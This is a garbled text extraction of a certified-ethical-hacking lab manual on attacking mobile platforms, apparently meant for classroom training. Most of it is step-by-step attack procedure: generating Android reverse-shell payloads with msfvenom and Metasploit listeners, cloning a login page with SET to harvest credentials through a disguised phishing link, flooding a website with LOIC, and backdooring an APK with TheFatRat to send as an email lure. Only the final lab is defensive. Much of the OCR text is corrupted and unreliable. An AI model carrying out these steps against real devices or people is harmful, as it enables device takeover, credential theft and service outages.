Download as pdf
Download as pdf
You are on page 1of 59
CEH Lab Manual Hacking Mobile Platforms Module 17 vane earn 7 Toaynt B wae 1 wortoot tw Mode 17 Mocking Mable Paton Hacking Mobile Platforms A mol deve alas commotion bse ners on rai freuence It oan aio ‘be ed to send ented content, ena, ad perm many mare tings asing the Inter. Lab Scenario Mobile devices ae replacing desktops and laptops, as they ceable users to access emai, browse the Intemet, navigate via GPS, and store critical data such as ‘contact lists, passwonds, ealendats, and login credentials. Also, the latest ‘developments in mobile commerce have enabled users to perform transactions such as purchasing goods and applications over wireless networks, edeeming ‘coupons and tickets, banking, ad more from their smartphones “Most mobile devices come with options to sead snd receive messages and em ‘and download appleations via the Interne, Though these are technological advances, hackers continue to use them for malicious porposes such as sending ‘malformed “apis” (application package fle) or URL to individuals wo entice them to click of even install them, by which attackers obtain users’ login ‘redenials or wholly ox purty take contol of their devices. Balieving that surfing the Ionemet on mobile devices is safe, many wers fal 10 ‘enable thei devices’ secu software. The popalatty of smarsphones and thet ‘moderately lx secuiyy have made them atactive and more valuable targess to attacker, ‘As an ethical backer, you mut perform various tests for vulnerabilities on the devices (mobile devices) connected to aneswork. Lab Objectives “The objective ofthis lab i to help students learn to detect unpatched security flaws in mobile devices and use them for performing penetration testing "The objective ofthis lab stor ‘+ Exploit the vulerabilite in an Android device Crack websites passwords + Use Andraid device to perform a DoS attack on s machine 1+ Perform Security Assessment on an Android Device “Cava Minar oe ——SCSCSC*~*~*~*~*S*S*S*U Cm Cp haope nol nonce Sk Draexs Overview Ca Mal Fe Tic iading ad Gonos Copa OW Mode 17 Mocking Mable Paton Lab Environment "To compete this lb, you will node + Acomputer running Window Server 2016 machine 1 Kal Linux running ia Virwal machine 4+ Windows 10 running on Viral machine ‘+ Android emulator running on vital machine (Vict) + Arwch browser with Intenet acess 1+ Adkministative privileges to nin tos Lab Duration “Time 70 Minutes Overview of Mobile Devices “Mobile devices allow shang of fes and messages and making them eat fr wets to access from anywhere, trespecve of time and location, "The latest mobile devices ‘even enable dating and editing documents on the go, All hese features have led to the development ofa new policy cled “bing your oun device” (BYOD), by which ‘users bring their mobile devices to work and we them foe performing work related tasks, Lab Tasks Recommended ib to demons moti plain hacking + Groaing Binary Payload using Kal oun to Hack Andro * Havetng User! Credentials sng octal Engineering Toolkit 1 Using Mobile Pafonm i afore Do Attack ona args Website Hacking Android Device witha Matous App ssng MeFatRat *+ securing Anérld Devices fom Malcious Appinocs Lab Analysis, Analyze and document he resol elated otis a exercise. Provide your opinion ‘on your agers secity pote and expose. Waghc aol epee odo 17- Hacking Mab Plato Creating Binary Payloads using Kali Linux to Hack Android Kali Linsce is a Debian-dovived Linus distribution tool designed for developing and executing explhit cade against a remote target machine. Lab Scenario Wit advancement io technology and implementation of BYOD polices, there is radial icreae in smartphone usage in the workplace Though compas offer robust network security, atackes/insiders attempt whack into employees? ‘mobile phones to obtain seastve information seated to the company of the employee GD wntiworreren AS a0 ethical hacker, you should be familie with all the exploits and payloads EMSA yailable ip Kal Linux to perform various tes for vulnerbiles onthe devices connected toa network, Lab Objectives ‘The objetive ofthis lab isto help students learn to detec Trojan and backdoor stacks, “The objectives ofthis lab inckade: Creating» server and testing devices located in a netwotk, which i prone sacks + Anacking a device using a sample backdoor end monitor the system activity Lab Environment ‘To complet this ab, you will need: * A computer running Winder Server 2016 ‘Kali Linsx ronningin Vial machine Android emulator mnning on vial machine (Vien) ‘et Tab Man Ps ecg ne Km ‘Mode 17- Mocking Mable Plettorrs = Aweb-browser with Internet access *Adminctntive pivages oun tok Lab Duration “Time: 29 Mines Overview of msfpayload mafpuload is commandline nse of Memsploit used to penente an ouput all ofthe vats spe of helcode tht ae avaliable in Metpat The ens! cmon {xc of this toal forthe geneation of shelled fran exploit hats teu in the Measplot Framework or for esing diffrent pes of shell and opsons bef iainng aml. Lab Tasks ‘Nowe: You need to navigate othe Android vital machine replay si zs if ‘efile 4. Log Ja to your Katt Linux visual machine Boras 2. ‘Type root in the Username rex fel ond cic Newt, Login to Moto 17- Hacking Moble Pators 3. Type toor in the Password txt Geld, and cick Sign In ‘4. Launch a command line Teeminal from the taskbar Berto Rope bad Pee Move 17- Mocking MeblePlstforms ‘ype the command service postgresal start and press Enter. 6. Open anew command line tein 7. “Type mafvenom in the terminal, and press Enter. restos Soe 8. Alis of avaible payloads is displayed ‘Application 9. Choose the payload that works for Android operating systems. Here, we — are choosing androlamaterpretartrverse tp. Ea Parton Aer 10, To generate «reverse meterprcter application, type matvenom -p androidimeterpreterirevorse_tep DesktopiBackdoor apk in terminal 2nd press pobadtehevcin 14, ‘This command creates Backdoor.apk application package file on the ae Desktop. Mines tackdworon Note: 40.40.40.44 isthe IP address of Kali Linux machine. ‘This IP adress ‘Kem seacines muy differ in your kb environment. ‘CN Tab Maal Ps BT eg anes pr ae Doras. = ‘on Explor Dveserenkisenal Module 17- Hacking Mabie Plato 12. Now, share/send the Backdoor apk fle to the victim machine (in this lab, we are using Androta emulator asthe viesim machine. 3k Fleinto share 13, Now strtthe Apache web server, copy the Baekdoo foler. Note: You cas issue the command service apache? start to start the apache web server. If she share folder is not present, navigite to [arloewuntn ax create a fokler named share, 14. "Type the command —_ep-—_rootDesktopiBackioor ‘nariwwwintmlishare! i the terminal, and press Enter, 15, Launch mefeonsole. 16, To launch mafeonsole, type msfeonsote in command line terminal and press Enter, Tomi 17. Type use exploitmultimandier and ptess Enter to handle exploits launched outside the Famewore i ing a emerson pr ama Mode 17 Mocking Mable Patorms 18, Now, sue the following commands in msfconsole Type set payload androld!meterpreterireverse,tep and press Enter, Typeset LMOST 10.10.10.14 and press Enter. Type show options and press Enter, This command lets you know thelsening pore 19, Type exploit 4x and pres Enter This command runs the exploit s¢ a background jb. Tah st ing a emerson a a ola 47- Hacking Mable Plt 20, Lauech the Android Emulator Vitwal Machine 21, Android Emulator GUI appears, click mom icon to launch Andeoid 2 Andi menu appeats on the screen, click Chrome icon. “Galak Mama siate—~SCSCS*~*~*S*SCS*CR gd Gone a “ish inured pmo cy Pee Mote 17- Hacking Mble Pstorme 23, Type the URL. htepilt0.40.40.ttishare in the search box, and press Download and 2 pop up appears, click Allow. [Launch the phe 24, Index of Ishare window appeats, click Backdoor.apk. Download the sppliction package le ‘ote: If any pop-up appears stating thatthe file contains a views, ignore the message and download the fle anyway. hndex of hare ‘Mode 17- Mocking Mable Platform: 25, Swipe down the Notification and Status Bar end cick Backoor.apk burton Deer) 2 cownload Manager Backdoor apk Download compete Cra 26, mainactivity window appears, click Next and then Inet @ Mainactivty Doyouwanttoinstalhis appleation? wi gt acces to: eee col phe ments 1 tosmay conyourneney reed pore stats and erty your test messages (345 oS) Ince tetansge SS) hemaycomyoumeney Insdib cote yur ard I 7 leo ‘it ating snd Gomes Cop Em Taig tines Repent Mote 17- Mackng Mabe Petorme 27, The application is succesfully installed, click Open, @ Malnsctivty pp neat Eire (2 Switch back to the Mall Linux machine. The meterpretor session has el lbeen opened soccessfilly a shown inthe following sereenshot mane! Note: 10:40:10.4 is the IP adress of the Vicim machine (Android Emulator) The IP adresses may vary in your lab envionment Gin Lab Mem Pa ‘it adtng snd Gonones Gopi Oy 6 ma Movie 17-Macking Mabe Plo: 29, Type sessions 41 command and press Enter, (I io sessions i 1 command isthe number ofthe session), Meterpreter shells lasnched as show in the following sreenshot 30, Type sysinfo command and press Enter, Issuing this command displays ‘he information the target machine, such a computer name, operiting system, and so on Tae Module 17- Hacking Mabie Plato 31. Type tpeontig and press Enter to display the victim machine's nerwork interfaces, IP address QPv4 and IPv6), MAC address, and so 09, 52. Type pwd and press Enter to view che current working directory on the remote (arget) machine. eT ‘tak Monat Fa i ing a emerson pr ama Modo 17- Hacking Mobi Porn 33, The ed command changes the curent remote directory. 34, Type ed fedeara to change the current remote directory to sear 35, Now type pwd and press Enter, 36, You wil observe that the current emote directory has changed to edeard ., Istoragevemulatedi0, conte = we | iat Hil "i singe omar ere Cam Mote 17- Hacking Mabie Paton 37. "To view minniog processes in Androld machine type pa and press Enter, Je wl lis ll the raring processes as shown inthe seeenshor. 38, ‘Type help and press Entor to view al the commands that an be used for post explosion iota Lt] 39. Thus, due to poor security setings and lack of awareness fan iodvidaal in an organization installs « backdoor fle in his/her devee, an atacker ‘gets control on the device. Attacker can perform malicious activities such 4 uploading worms, downloading sensible data, spying oo the wser keystokes, and so 00, which can reveal sensible information relat the organization as wel as se victim. Sh, teem Mode 17 Hacking Mlle Paton Lab Analysis: “Analyze and document the rsuks related to thie Ib exercise. Provide your opinion ‘on your target's sceurty postr and expose. PLRASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Required No Bitabs Ca a Maal yD ica ting a Guess Cop 0) KE ‘hpecenes upactseaay Mate 2 vane 7 Tengo Tolle Bl werent ED wontateeven Move 17-Macking Mable Pte Harvesting Users’ Credentials using the Social Engineering Toolkit “The Seid Eginering Tele (SET) is an open some Python iten tol aired at Pennant cud sal ening Lab Scenario Socal engineering is an ever rowing threat w orgaaizations all over the world, Social engineering atacks are used to compromise companies every day. Even though there ate many hacking tools avalible with underground hacking communities, a socal engineering toolkit isa boon for atacker, as itis feely available to use to perform spear phishing atacks, website attacks, and so on. ‘Attackers ean draft coal messages and atach malicious Fes and send them to a lange number of people using the spear-phshing atack method. Also, the muli= stuck method allows utlastion of the Java applet, Measploit browser, (Credential Harvester/ Tabnabbing, nd others all at once “Though numerous sorts of atack can be performed sing this toolkit, thiss also 1 must-have wol fora penetation tester to check for vulnerabiltis, SET isthe stanear for social engineering penetration ess and is supported heavily bythe security cmnmnunity. ‘Asan Information Security Auditor, penetration tester, or security administmtoe, you shoald be extremely Familia with the Soci Engineering Toolkit to perform various tests for vulnerabilities on the neswork Lab Objectives ‘The objective of hi ab sto help sadn lea to + Cones wesite Obtain usernames and passwords using the Credential Harvester method + View rpors forthe stored passwords “Gia gs —~S~S*~*~*S”S*S*CN igre Cn Tilo aaveshesenoe eye Mode 17- acing Maile Pitfomes Lab Environment ‘complete this ab, you will need: Kali L.inex running in Virtual machine *Andtod emulator suning on viral machine (Vici) © Awe browser with Intemet acest + Adicsoaive privileges torn ols Lab Duration “Time 10 Mines Overview of Social Engineering Toolkit Scova Eaginese Tool i an openeouce Pyhon ven tol smal at penton tenting round Soci Engicaig, The SET is speiicaly designed to perm Advanced aac punt the human cement The stack bu no the tol are designed to be wrgeted and focused auacks agains @ pason or orgaizaion used dung a penetition te. Lab Tasks 1, Log Into the Matt Linux virtual machine rasn Engineering ‘Footie “Gtiak Mand yee —~—~SC~*~*S*S*S*SCSTSSC aa Co Sy NN Mode 17- acing Maile Pitfomes 2. Go to Applicaton > 08 - Explotation Toots > social engincoring Note: While launching seoolkt, you may be asked whether 10 enable bleeding-ede repos. Type no and press Enter. 3. Ifa Terminal window for SET appezts, type y and press Enter co agree to the terms of servic, Geran Tid nkng ct ammmcnom ORES ‘Mode 17- Mocking Mable Platform: 4. You will be presented with 2 menu containing a lit of attacks. Type 4 and press Enter to selec the Social-Engineering Attacks option. 5, Allist of Social Bopincering Attacks appear, type 2 and press Enter 9 sclect Website Attack Vectors, Movie 17-Macking Mabe Plo: 6. From the Bit of website attack vectors, type 3 and press Enter to select Now, iype 2 and pross Enter co solet the site Cloner option from the Mode 17- acing Maile Pitfomes 8. Type the IP address of Kall Linux vrzal machine in the prompt for IP address for the POST back in Harvester'Tabnabbing ari press Enter, In this exemple, the IPis 10-10-10.14, "Note: IP addess may vary in your lab envirosment 9. Now, you will be prompted for a URL to be cloned type the desired URL to Enter the ur to clone fel and press Enter, In this example, we have used httpsswew.facebook.com. This will hein to clone the website Gas Mana ict nga Gemma Merle 17- Hacking Mobi Plato 10, After cloning is accomplished, the highlighted message, as shows in the following screenshot, will appear on the Terminal screen of SET. 1 This ntates the Credential Harvester in SE 12. Leave the Credential Harvester Attack to fetch information from the victim's machine 13. Now, ou nced to send the WP address of Kali Linux machine co 2 victim (@huougs emails, social networks, ex) and wick him/her ellek the fadaross embeded ina link to browse the IP address. peeves 14, For this demo, hunch the web browser in Kall Linux machine log in t0 an email service and compose an email. In this example, we have used ‘wore gmail.com, Then, lick the Link [°° feon Note: You ean use Gttek to affix a hypertnk Drsareteine ty Dirwcateis sence Moe 17- Hacking Mabie Paton 16, In the Eat Unk window, Gest type the acta addcess in the Web address ficld under che Link te option and then type the fake URL. in the Fant to dcplay eld. In this example, the web address we have used is muipstosorost and text to inplay is worw facebook.comlcelebrity ples. download, Click OK 17, "The fake URI should appeat in the email body. fo view tha the actual URL embedded in the fake URL, click the fake URL (ie, wowJacobook.comleelobrity pics download). Sond the ‘email to the intended use. vices oes alec conning eet tan x, ene a [conpenneijoweinee. “Gata tama yess —~—~SCSCSCS*~S*S*SCSC gd Cp Oy Map Rowweetpmctons cy Poe oe 17- Hacking Mabe Paton 19, Whea the victim (you) clicks the URI, he or she will be presented with 2 replica of Facebook.com, ‘Note: 1P adress of the target machine is displayed in the address field instcad of wwwdacebook.com. TBRr 2 Switch w andioid machine (as victin), log into your email account, epen ere ‘the email and click the malicious lnk ‘Log into tho Cloned Website 21. As soon asthe victim cick the link, he/she wll he rediected to-a doned webpage of Facebook. 22, When the victim enters the Usemame and Pasaword and clicks Log tn, indoes not allow logging in; instead, redirccts tothe legitimate Facebook login page. Observe the URL in the browser. “Note: If any Confiem poprap appears click Newer Til acang on Gamers Ge 6 ak Tigi Roeser serait 23, As soon as the victim types inthe credentials, the Kall Limo fetches the cevered username and password, which ean be used byan stacker to gin ‘unauthorized accesso the victim's account, The credentials are stored in ‘he location uarishareisetarclogs. [Navigate to Kal Linux deskanp and open the SET terminal. SET has ‘obtained the wser credentials and is displayed in the tenninal window. Note the user credentials and press Cttee when finished. ea Mode 17- acing Maile Pitfomes 25, A mesage pops up asking you 10 press Enter. Afer you are finished, close the terminal window: 26, Navigate to asr/sharelsaterilogs, and double-dick the harvester filet view the port. GLAS Ma Pa ict nga Gemma Mote 17- Hacking Mele Porm 7. The log fle appears as shown in the following screenshot sat eT amceee GUE 24 cl aig Tl ED Ret 28. "Thus, if an individual enters his/her credentials without proper sesersment of an email or the website that i being browsed, an stacker harvest: them and uses them to log into the vitim’s account and obtain sensitive information, Lab Analysis Asalyze and document the sus selted to this bb exercise. Provide your opision ‘om your targe’s security posture and exposire, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS. Des EINo Platform Supported Classroom. Bitabs “GEIS Miomd eT ——SSOSCS~*~*~*~*~*~*CR il Ce ‘Miki lcerel bpmdasio uc Poet Moa 7 Mackng Mable Petar Using Mobile Platform to Enforce a DoS Attack on a Target Website Lanw Orbit Ton Canon (LOIG) i a epem source neboork: ses testing and dol of sevice attack appbtin on a target site| machin by flooding it with TCP or UDP packes with te inten of ding te see of a parialr bast "zy Lab Scenario vate LLOIC performs « denal-ot service (DoS) atack (or when used by muple stam indi, a DOS atte on a target sit by flooding the server with TCP of F tocsos UDP packets wit the intention of darting the service ofa particular host tee People ave wed LOIC to join voluntary botnets. BL vcrccsic As an information secutty auditor, penetmtion eter, or sect administrator, [D vostuorenme YOU should be extemal fumilir with deniahof-service attacks Lab Objectives "The objective ofthis ab is wo help students lara to use LOIC mobile application and perform denial of service stack on a target sit Lab Environment ‘Tocomplet tis lb, you wil nocd: 1 Andnid emulator sunning on vietul machine Windows server 2016 munning asa vinual machine + Awweb browser with Intemet access 1+ Adminisuaive privileges wo ron tol Lab Duration “Time: 10 Minutes Cah Mal aE Tic aig and Gomes Coa OW Rgpc aol ‘Mose 17- Mocking Mable Platorme Overview of Lab "This ab demonstrates how to perform DoS attack on a target sit. Here, you wil fist access LOIC application from the Windows Server 2016 machine using ES Fe Explores, inwall i and lainch a denil of service atack on the target ste Ge, catfedhacker.com). Later, you will cosscheck the attack being performed on the site by ning, Wireshark Lab Tasks 1, Before beginning this lab, login and ensure that Wireshark application is ingalled on the Windows Server 2046 viral machine, metal LOI 2, Launch Android viral machine. 3. Clicks File Explorar icon on the home screen to launch the application. ‘Gah Mant Pee "Ea ating an Camere Capris Mote 17-Hackng Mobi Ptorms 4. ES File Explorer wiedow appeats, espand the Metwork drop-dowa list, click LAM, and then clic the Computer icon IP adress in your lab environment wil differ according tothe ‘cols folders shared Note: IP of te loeal machine on which the CEHT- Dest tatone 5. Glick CEM-ToolsiCEHv10 Module 10 Denial of ServicelDos and DDoS 6. Glick Low Orbit ton Cannon LOIG.vt3.ap file to install the application. rita anal Pas BT Til aking Gomensmans Cp Oy Emel Tiishe red ywcicton ss Poco Mode 17-Macking Mable Platforms 7. The Properties pop-up appears; click instal Properies FE oon comon ioe asa at ‘ae aaswa Package Name: com genus nfansshidiowerbioncarman Cancel Market ‘LOURE4 otag OHE 8. The LOte instalation wizard appear; click Install BB Loworbit ion cannon ‘Do you want io nstall his application? It doesnot eau any special acess Gia Naa Modul 17 - Hacking Matte Paton 9, Oncompleting the installation, click Open. 1 Lowo1bitton cannon 10. "The LOIC window appears. Hete, you need to set target (a website or amachind. 11m this lab, we shall be performing denial of service attack on cenifiedhacker.com. 12, Inthe URI. field ype netpslwwrw.certitiodhacker.com tnd click GET IP 13. Once the machioe is locked, its IP address is displayed as shown in the screenshot. Dircr eave sos Movie 17- Mocking Mabie Platforms 14, Now, frst sleet the Te radio buston and input 80 as the port and i the ‘reads feld spe 400. Then clck the Stare button ss shown in the screenshot. 15, LOIC begins to food the target website, which we will see by sunning Witeshatk 16, Switch to Windows Server 2016 machine and launch Wireshark. Double click on the required nctwork interface to star packet captuting. awe uns 7S aL Mae a ating an meme Sm Mode 17-Macking Mable Patton 1. ln the Apply a isplay filter fied type tep-port #200 and hit Enter, ‘Wireshark displays the effi traversing between the Android and target ‘website, as shown in the screenshot: 18, Note the high number of packets being sent by checking the Packets fel in the bottom, Divina GORE S16 Wind Dp ei 19, Now we open a browser (here Intemet Explore) and in the address bat ‘ype httpviwwnn.certitiedhacker.com and hit Enter, 20. You will natice that the browser is unable to open the target website. Divine pete sree rie Epc Soma ‘moni oe GUM AH “GEM get ——SSSCS*~*~*~*~*S*S*S*« amc CO ise owed Reco eS Poel ‘Mode 17- Mocking Mable Platform: 21, Open the Wireshark window and click Stop capturing packets button. 22, Note the high amouct of packets sent in the Packets Geld at the bottom of the Wireshark window. inten ‘iors Se omy mee > 23, Switch back to the android machine and stop the Booding by clicking on the STOP bution, Mode 17- Mocking Mable Platforms 24, Switch to the windows machine and retry browsing the target website, this time you willbe successfull able wo browse the target website 25, Thus, you have successfully performed DoS attack from a mobile device onto vulnerable tagger website Lab Analysis Aly and document the resus raed to hsb exercise Provide your opinion on yn tages ecury postr and expose. PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS ee) ‘Gi La Maes ‘il aang nd Gomera Cop "Earned pero GELS Maa Ps Ted Hating ad Gomis Cok Oh Mode 17 Macking Mle Pistons Hacking Android Device with a Malicious App using TheFatRat “Titec an exh eb bib ns amar ni fame oa a ene ie _mvcare can be exaaded on winches, ach a, Lab Scenario ‘Socal Engineering one ofthe most typically used attacks bya hacker Asthe recent teens suggest, muey prominent orgarizatons fill vei 1 this atack vector The anackar tick the stat of« workplace to ek inks in legate looking document ‘which tum out io be malicious and even able to evade the anti-virus programs, Lab Objectives ‘The objective ofthis ab is to help students lear to detect Trojan and backdoor attacks “The objectives ofthis ab include: 1 Auacking a device using a sample backdoor end monitor the sytem activity Lab Environment “Tovcomplete this lb, you wil need: ‘+ Kal Linus cunning in Virual machine + Andeoid emulator running on vital machine (Victim) + Avwob browser with Internet acess 1 Administative privileges to nan tools Lab Duration "Time: 15 Minutes ‘Eien epceno r Modo 17- Hacking Mobi Porn Overview of TheFatRat hela provides an easy way o ereate backdoors and payloads which ea bypass oat adv systems, Lab Tasks Bb riemt 1. Before staring the lab make sure dha you are logged iat he Kal ux ee aching, and ‘TheFatRat hasbeen install ini 2. Launch terminal window, ype fatrat and hit enter to stare aia Taeua GE Teee eT 2 TheFer nin window sppents hese we ae backdboig an geal pe Si Sle the Backdoorng original ap nstagram, Line te] pic by Makes ng 8 and hit enter Backdoored apie ey = aa oe Mode 17-Hacing Mob Plato 4. ‘Tekdoosing options are show inthe teminal window, type €Kall machine > ss LHOST andl 444d ax LPORT. In this lab, the Kali machine's IP is ‘sooo. 5. Now navigate wo the CEM-Tools folder on your kal machine desktop, Mote 17- Mackng Mabe Petorme 6, Navignte to the CEHVIO Module 17 Hacking Mobile Platforms snd copy lappy. Bird. apk Sie as shown inthe sereenshot. Paste this le onthe Kalimachine'sdeskiop and gives loeation inthe Path fick in the terminal winds, Module 17- Hacking Mobi Paton 8. Choose Payload option comes, here type 3 and hit Enter. 9, Select Tool te create apk option comes next here ype 1 an it Enter, Merle 17- Hacking Mobi Plato 10, FatRat sans to prepare the backdoorel apk file and shows the file deal as shown inthe sereershot 11, Note the locaton ofthe backdoored ap fle, Do not erate she msfeonsole Ixtener and ype mand hit enter, Press Enter to eit the buckdoo ing options. esmcmmn Cp By EE ‘Modo 17- Mocking Mable Porm 12. Now we shall creates malicious email and sttach this backdoor ape forthe —Sitasns ‘victim to dowmload. When composing 2 new email, click the Attach fies ‘Share the apk File bution as shou inthe screenshot. ‘withthe Viet AGU: Awaba haan na 13, In the file upload window, navigate 1o the location of your backdoor ap file (here mootTheFatRatibackdoored), slect the backdoored fle (here ‘pp _hackaoor.aph) an click Open. ‘esterany Frye Yesterday GUAT Gem 14, Now craft legit looking email so that dere are high chances ofthe vitim dowaloading and instaling it and with the attache malicious ape le elic Send, cetusee66eauten com Cone Gane Eve Hey gett heck it ms cones st leased My an Scores 999, eva ea ay tan typ beaaooraph GTA) IGOR: Caty eg ma “GH ima ——SCS~*~*~*~*~*C em Cap Oy AM Myc hocel Repent Sc ee Moc 17- Hacking Meio Pattorms = 15, Now open another terminal window and type mefeonate snd bit Enter. Set Up and Run a 16, Metasploit Pramework stars, here we will setup alistenes To make listener, fallow the folowing steps A. "Type use multthandler 2nd hit Enter. 1B. Typeset payload androidimoterpretonroverse. tp and hit Entor. G Type set LMOST ard hit Enter. Hlte the Kall machine's IP 40.40.90.49. D. Finally ype set LPORT 4444 and hit Enter Mode 17- Hocking ble Patorms 18, Now switch tothe vitin machine (noid) nd download the malicons apc fle received inthe vicim’s email Click the downloaded filet natal tas shown in the screenshot, 19, Do you want to instal his aplicaion? Window appews, click sta © Fappy Bird ‘Do you want to instalthi application? it wil get access to: ‘ccs precise locaton (GPS and network based) record audio ct ca phone numbers {© tisimaycostyoumoney readcallog read pone status and identity wt ell og read your text messages (SMS or MMS) teceve text messages (SMS) ‘B tiemay castyoumeney mod oF delete the content of your $0 cord read the contents of your SO card “GLa et ——SSCSCS*~*~*~*~*«U Te Mote 17- Hacking Mobile Petr 20, After the fe is installed successfully, dik Open. © Feppy ied App stated | 21. Now when you switch back to the kali machine, you will see that 2 TE tasKe a smeterpreter session has been opened in the terminal window. Got Exploited Victim's Details =e Eis nal Pe ‘ial Hang Canc Gp Oy HO Modo 17 Macking Mba Paton 22, ‘Type sosstone 44 and bit Enter to connect to the vit machine through metespcet. ria ooo 23, Nowe you can nun commands ice sysinfo and pwd io get details of the vet Lab Analysis Analyze and document your rests tet his ab eer, Provide your opinion con your tet secu porte ndespoeure PLEASE TALK TO YOUR INSTRUCTOR IF You HAVE QUESTION: Yes No ‘Platform Supported Classroom Citabs GLa Maal Pe "ied Hating ad Gunns Cpr HE am 2 vate 7 tenor nollie Bl weenie D wonton sven ‘Gi La Mem a ‘ite ating snd Grnemnnons Gi Oh, Bm oe 17- Hacking Mabe Paton Securing Android Devices from Mabvarlyes Seay opp provide fl funionaiy to protetyour Andra dei Using i-th mat nie you con anor pom demand or a the tea of Jove chee, Lab Scenario Android's growing popularity has led to increased eeu threats, ranging from typical malware to advanced phishing and ID theft techniques, Many security software companies have lunehed ther security apps to help Android users to deal with these sues that will cover all requirements inchading « group of ‘complete security suites with anti-theft capabilities ‘The penetration tester will scan for any unsecured settings your device may have and wil advise sceandingly. The Paivacy Advisor, onthe other hand, scans and lists ll the installed apps and categorizes them under three categories: apps that -may cause costs, apps that may hati your privacy and apps that may access the Internet. You can sort the categories to your own needs using the scons atthe ‘bottom, The Spam Protection i forward yet effecsve call and SMS fer, andthe recently added App Protection wil lock any app you want with an alphanumeric password. Lab Objectives “The objective ofthis Ia to hep stadents lean to: * How to scan for malicious applications and fles on Android mobile device: ‘= How to usinstall malicious applizations = How to dle the malicious fs Lab Emvironment ‘To complete this Ib, you wil need Tigi Roeser Moc 17- Hacking Meio Pattorms + Android emulator raasing on vittal machine + Awe browser with Intemer acess 1 Adminisrtve pigs un one Lab Duration “Vie: 15 Mites Overview of Lab Malwariyts Secu autooatcaly sans apps a you esl vem. This atv fancoralty helps yout avoid nvased sofware which ean kad 0 data oss and senexpected costs. tale protects your devie from tacks via USSD ot other special codes. Moreover, if your devices bs or stolen,a remote lock or wipe wil sed your personal information fem prying eyes. Lab Tasks Se 1, Launch Android Emulator and click Play Store icon on the Home Ea Sereeo, jueatt 2 Make sure that google account has adda ito the Phy Store if aot, create rene ‘new one and ald the aceount. “GiilLakamad Puc ———SSSSSC nd Cres Ci ly Mie eel Reduce ce Poe Mode 17- Mocking Mable Patios 3. In the Ply Store scarch bar, ype Malwarebytes Security and select Malwarebytes Security: Antivirus & Anti-Malware, as shown in the screenshot 4, The application information is displayed, clic INSTALL to start the insulladon of Malwarebytes Security. You can also read further by scrolling down. bAarlararahstac wares Sac Aa eta ‘2900 RS iy Minter (ab Manel Tig Gc 5 et ‘Mode 17- Mocking Mable Plettorrs 5, Once the apliaton i insted, click OPEN to Iaunch dAarlwrarahstac Oo. - 6. Maivarcbyreswelcome seeen appears swipe to view the next sere. £ odo 17- Hacking Mobi Por: 7. Inthe next crea click Got Ito start Malwarebytes, 8. Malwarebytes will ask the user for permission to acces the fs. Click ve permission. Noto: assem pop-up appears asking for pemissions, click ALLOW. a Pa ‘ica Nstng snd Gomer Cop Bam ‘Mode 17- Mocking Mable Plettorrs 9. Welcome w your premium il window appears, click MY DASHBOARD. Welcome to your Tirare 10. The Mlvarbytes dashboard appears, under te Last Device scan heading, ——n click SCAM NOW to launch a malware sean cm your Andzoid machine. RUNES hey Daten “Gikiab em —~—~SCS*~*~*”*”S”S*S*C« gd Ge Crh ya Tigi ores lopment Mode 17- Mocking Mable Platforms {IL The program scan your devie, and threat window opens. Here you wil ee alle maivare fer) found on your device. Click Remove selected btn, to remove the deteted malware fom your device. GARD S16 Mac date 12 A confimation window pops up, dick OK to confirm the removal of malware Confirmation 13, Main Actity window pope up, click OK to uninstall the malicious app from our device @ Mainctity yeu mt tonne og “GATE eas SSSCSCSCS*S*S*S*C a Cy Tipe toweal upectoes Sas Po Mode 17 Hacking Mable Patton 14 Now navigate back t your dashboard and seoll down so fied Device Bans ‘Administeaior is not enabled heading, Under this heading click the Enaie Device Administrator button, Hnctasi9 Mares tak 15, About Acminisuation window pops up, eck BO FF NOW. © ret isaten anc tat you night end andto enable Rel Tame Protection tough fle This precio alco rtets Malwarebytes rom bing uninstalled by mallow aps CTT Mal eB “ad Wading so Gomensmons Coit hy EOE agi hneel apace whe Pet ‘ode 17- Mocking Mable Petr: 16. You will be aken 1 Activate device administrto? Window, click Actiato this device administrator. Now Maluarchytes has admin privileges ad will ‘ep real ine check on your device for malware and other threats Lab Analysis, Analg and document your results tl to his ab eerie. Provide yur opision ‘onyou taye?ssecuriy porta and exposure, PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS Tntemet Connection Required "Aisi tnd

You might also like